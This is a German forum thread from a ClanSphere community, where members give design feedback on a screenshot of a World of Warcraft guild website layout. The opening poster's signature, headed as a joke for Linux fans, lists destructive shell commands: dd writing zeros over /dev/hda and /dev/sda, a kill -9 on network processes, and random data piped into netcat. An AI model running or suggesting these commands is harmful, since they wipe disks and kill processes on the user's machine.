Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 6
Seite [1]
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1401
# Thema - 16.01.2010 um 00:33 Uhr
http://www.krahkrah.net/v3/v3_09.png

Ich bitte mal um Eure Meinungen und Kritik.
Es ist noch nicht fertig und es wird sich sicherlich noch einiges an dem layout tun, aber dass ist zumindest schon mal der Grundstein wie ich es mir in etwa so vorstelle.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443
Inaktiv
e30micha


Poststar




Herkunft: Trier
Beiträge: 639
# Antwort: 1 - 16.01.2010 um 10:34 Uhr
Hey pHaeno*,

für eine Gildenseite erstklassig , im headbereich solltest du besser noch die rechte Seite mit dem Mensch ein bisschen ausblenden, in etwa wie die rechte Seite. Damit der Name und die mitte besser zur Geltung kommen.

Fireworker?

Alles in allem gefällt mir die Seite jetzt schon , der untere Bereich wird ja noch bearbeitet?

Beste Grüße

micha

PS: Das Logo ist sehr nice


------------------
„Wenn Unrecht zu Recht wird, wird Widerstand zur Pflicht!“ - Bertolt Brecht


Inaktiv
|
Pred


Poststar




Herkunft: Bischofsmais
Beiträge: 762
# Antwort: 2 - 16.01.2010 um 23:40 Uhr
sieht gut aus. Es gibt irgendwie keine guten WoW Templates... das Insomnia (oder so) Template gefällt mir bisher immer noch am besten


------------------


Inaktiv
|
Sworn


Beginner




Beiträge: 10
# Antwort: 3 - 17.01.2010 um 10:09 Uhr
Sieht recht gut aus.
Ich finde aber, dass der Header zu groß ist. Ebenso die Nav-Buttons(Beschriftung) da drunter.
Dadurch rutscht der wichtige Teil einer HP, der Content, zu weit nach unten.
Das Schriftgrößen-Verhältnis untereinander ist auch noch nicht so stimmig.

Mag zwar auf >24" Ausgabegeräte annehmbar sein, aber bei Geräten mit kleinerer Auflösung nicht weniger toll.

Die Schriftart im Newsteil liest sich nicht gut.

Die Grautöne(Background) der einzelnen Bereiche verschwimmen etwas ineinander.
Auf mein 24" LCD erkennt man zwar die Kontraste(Farbstufen + Border), aber auf'm Lappi(Acer 5920G) muss man schon genauer hinschauen.

Ansonsten, Farblich und von der Idee her sehr stimmig.


Inaktiv
|
floH


Rock the board




Herkunft: Reichenberg
Beiträge: 82
# Antwort: 4 - 22.06.2011 um 13:37 Uhr
Öhm eine Frage hab ich: Wo ist die Script Info?
Edit: Hach oder ist das gar nicht CSP? Ich dachte nur weil es hier im Forum war nicht böse nehmen

Ansonsten ein sehr schönes Design und passend zum Namen der Gilde. Im großen und ganzen sehr Stimmig das ganze


Zuletzt editiert von floH am 22.06.2011 um 13:41 Uhr (1x Editiert)
Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 5 - 22.06.2011 um 13:41 Uhr
Ist scheinbar kein Clansphere


------------------
www.laszlokorte.de

Inaktiv
|
floH


Rock the board




Herkunft: Reichenberg
Beiträge: 82
# Antwort: 6 - 22.06.2011 um 13:42 Uhr
Jap hab es gerade auch gesehen... erinnerte mich nur stark daran. Hab mich verleiten lassen I'm sorry.


Inaktiv
|
Antworten: 6
Seite [1]


Sie müssen sich registrieren, um zu antworten.